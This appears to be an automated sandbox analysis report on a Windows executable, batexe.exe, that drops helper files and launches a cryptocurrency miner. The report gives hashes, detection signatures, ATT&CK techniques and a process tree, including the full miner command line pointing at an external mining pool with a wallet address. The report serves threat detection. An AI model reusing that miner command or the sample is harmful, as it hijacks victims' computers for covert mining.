73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
303s
max time network
307s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18/02/2024, 13:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4780	b2e.exe
5396	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
5396	cpuminer-sse2.exe
5396	cpuminer-sse2.exe
5396	cpuminer-sse2.exe
5396	cpuminer-sse2.exe
5396	cpuminer-sse2.exe
5396	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1792-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1792 wrote to memory of 4780	1792	batexe.exe	85
PID 1792 wrote to memory of 4780	1792	batexe.exe	85
PID 1792 wrote to memory of 4780	1792	batexe.exe	85
PID 4780 wrote to memory of 456	4780	b2e.exe	86
PID 4780 wrote to memory of 456	4780	b2e.exe	86
PID 4780 wrote to memory of 456	4780	b2e.exe	86
PID 456 wrote to memory of 5396	456	cmd.exe	89
PID 456 wrote to memory of 5396	456	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1792
- C:\Users\Admin\AppData\Local\Temp\3803.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\3803.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\3803.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\438C.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:456
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3803.tmp\b2e.exe

Filesize
988KB

MD5
b7ecdaf4a609a769f85bdc49118ba0f5

SHA1
8e1361e7d2a90839672787df82b743f6c9b25867

SHA256
c888befd0ce50f4acdc66ab6d21bf73f16f0e0e05d8b47bfba79a39b663db363

SHA512
bfce346f7d442dc27ee62a70a9ad6f67dd2a17b2b2fde6fc6cd77204a96216a89dcdae042165ea3a396cbe8746d51ce87a148ba6912c967081edf76e6b0de24d

Download Submit
C:\Users\Admin\AppData\Local\Temp\3803.tmp\b2e.exe

Filesize
2.1MB

MD5
c65046109eeacc05c12e1d2d47bbcdce

SHA1
f684b885a159684fdc5f276d2e97f1f62e656147

SHA256
3de769cb77e6c4e7be2f7c2683b6e3a7f58f7cd8261f25cd14c868163a5f82fc

SHA512
a0bd72ec5132d11f00120b161c4df1aa93f734dcf9d9b9bb1eda51f96a74a69276aaec7e8cf1fcb762362e887569ad4cb2dbd40aaf541141dfb1ffb7eb51d2dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\3803.tmp\b2e.exe

Filesize
2.3MB

MD5
7e118ee82c731a138d2c0ffe58f39bb3

SHA1
f0535a0081fe4f5520f213261ab48ccd2a76240a

SHA256
ac9a081e1e5dc85d5fb27a89ba974d48c0b983b3a43adf197381be8694448123

SHA512
3cef77c1a9f445e7dc4d857284520af0fa6c439de0c7dfd6fb74b817e99bb540d031984a99fa4b55401dd5c04ad2ba1b39c93d929fc528e54a7f51beccea5727

Download Submit
C:\Users\Admin\AppData\Local\Temp\438C.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.3MB

MD5
2ed74b47e09142aa65566bf462b3f6da

SHA1
63a025ed43f7b2cdec91b7e4e901d5dff0b0b300

SHA256
9c3ff15f979c2fcfa08be3b394f390654f74e7aeaada9df754e37c41de085c2b

SHA512
389088c4572aa6a41af748ec82f0d575df4730015311fc47735800b12f03b49eaf5db84210942c28e3cbbdbedaf28bab228abfa1fd4f34b72d72bc0ef65fe183

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
405KB

MD5
98dde509a490804eaebf0dbaf8d93d1b

SHA1
0a14061187f29fa065aef58e31315889c212cc26

SHA256
be471a02a6df375adaba9ef11866ddc6f17705e8bb913c6b67db5235bcd45390

SHA512
74649f1ea88b7a92c4b8eef67f5e578aeeb239e29efb47256128f739b4844288961a7697cc39453536eaa6336f1a7155a5f731ecb3e06529d672bd5dc32af05d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
4fe81e9d1694b2e2b68b268dae73997f

SHA1
d4a485b8660e7bf3add3ee7b144986b0d65c1ef6

SHA256
0822cf685cafd115eb454a76ce889fb02ec8bff984a8605c5a7cefb274e45c06

SHA512
434901e2574b33ff977ffd2f5657e57ffd08b6378691a9599842991536e7320491467f9161c7cdb1c494cf870ff813ea016e7a2aa4ba8682e9657566ecb4c513

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
7745843f085cb1d08c2a03ee7bbd340a

SHA1
6e2e606b29d3a0587419799810f82cd401135033

SHA256
6e55364035d8a81919c03dc3adf7ca50ebe8e01b89487f9468cbadde47969ac2

SHA512
466a36f5b2c30ddcedf57781253e50cb3763580b1c1c7a64342f18a7f262efc551d395cb3efeb3ca347575041fa32763032011d6acb4d99c368157bd5ebd3363

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.3MB

MD5
7d0ef0d149195f962fc3bace4a8a5be0

SHA1
02ad639d2e55111e238ef1321782988a5a0c4c31

SHA256
e98b629f95ad75765a272749f3a8f4cb5e6946e3122f9e45a902ab7be3c9856a

SHA512
a5ae6cad6d533c23dd970e4b6044ad43c75317e47d3fb06febae3c70ce280d1797e9310e923abc8a6e7e866ce12242bd088f65d48e5cc32b253ceedcb2825048

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1792-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4780-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4780-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5396-48-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/5396-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5396-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5396-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5396-49-0x0000000065FD0000-0x0000000066068000-memory.dmp

Filesize
608KB

Download
memory/5396-50-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5396-42-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/5396-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/5396-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5396-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5396-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5396-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5396-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5396-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5396-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5396-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download